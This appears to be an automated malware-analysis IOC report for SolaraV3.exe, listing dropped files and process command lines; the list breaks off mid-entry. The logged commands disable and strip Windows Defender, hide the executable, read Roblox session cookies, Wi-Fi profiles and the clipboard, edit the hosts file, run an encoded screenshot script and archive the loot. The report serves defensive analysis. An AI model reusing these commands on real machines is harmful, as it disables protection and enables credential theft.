IOC Report
SolaraV3.exe

loading gif

Files

File Path
Type
Category
Malicious
SolaraV3.exe
PE32+ executable (GUI) x86-64, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\Temp\_MEI28842\rarreg.key
ASCII text
modified
malicious
C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (612), with no line terminators
dropped
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0x261b5efc, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
modified
C:\Users\user\AppData\Local\Temp\ ?? ? \Display (1).png
PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\MpCmdRun.log
Unicode text, UTF-16, little-endian text, with CRLF line terminators
modified
C:\Users\user\AppData\Local\Temp\RESF203.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4c2, 9 symbols, created Fri Oct 4 15:28:40 2024, 1st section name ".debug$S"
modified
C:\Users\user\AppData\Local\Temp\_MEI28842\VCRUNTIME140.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI28842\_bz2.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI28842\_ctypes.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI28842\_decimal.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI28842\_hashlib.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI28842\_lzma.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI28842\_queue.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI28842\_socket.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI28842\_sqlite3.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI28842\_ssl.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip
Zip archive data, at least v2.0 to extract, compression method=store
dropped
C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes
Zip archive data, at least v2.0 to extract, compression method=store
dropped
C:\Users\user\AppData\Local\Temp\_MEI28842\libcrypto-1_1.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI28842\libffi-7.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI28842\libssl-1_1.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI28842\python310.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe
PE32+ executable (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI28842\select.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI28842\sqlite3.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI28842\unicodedata.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0umvczke.yjq.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_21u3tjdl.isn.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2anuzdex.hfv.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2nx5tlhe.uy0.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_45y04qvf.dom.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5pqqnxlf.mfu.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h33ja5af.4yp.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hp54fb1q.2gs.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o10m2tcb.yza.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_odi1wr22.l0h.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_prybmjqg.2sy.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qguj5uuh.d2k.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qhwlnnpk.ucj.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qvkwfz0s.3d3.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s2h1d4le.1dp.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u1wg00js.dft.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uidiymg4.rdm.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v2qt1z15.jx2.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wfbhdf3t.3du.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wt2lezrh.c0x.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xt4mjqas.uhw.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y2jmv5sg.bun.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\se3yji4z\CSC9CC35FFA2F54059AD6E143F6E3C2E84.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.0.cs
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.out
Unicode text, UTF-8 (with BOM) text, with very long lines (720), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\w0e8R.zip
RAR archive data, v5
modified
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
\Device\ConDrv
ASCII text, with CRLF line terminators
dropped
There are 49 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\SolaraV3.exe
"C:\Users\user\Desktop\SolaraV3.exe"
malicious
C:\Users\user\Desktop\SolaraV3.exe
"C:\Users\user\Desktop\SolaraV3.exe"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()""
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
malicious
C:\Windows\System32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
malicious
C:\Windows\System32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe""
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'"
malicious
C:\Windows\System32\attrib.exe
attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
malicious
C:\Windows\System32\systeminfo.exe
systeminfo
malicious
C:\Windows\System32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
malicious
C:\Windows\System32\netsh.exe
netsh wlan show profile
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
malicious
C:\Windows\System32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
malicious
C:\Windows\System32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
malicious
C:\Windows\System32\getmac.exe
getmac
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
malicious
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *"
malicious
C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe
C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
malicious
C:\Windows\System32\cmd.exe
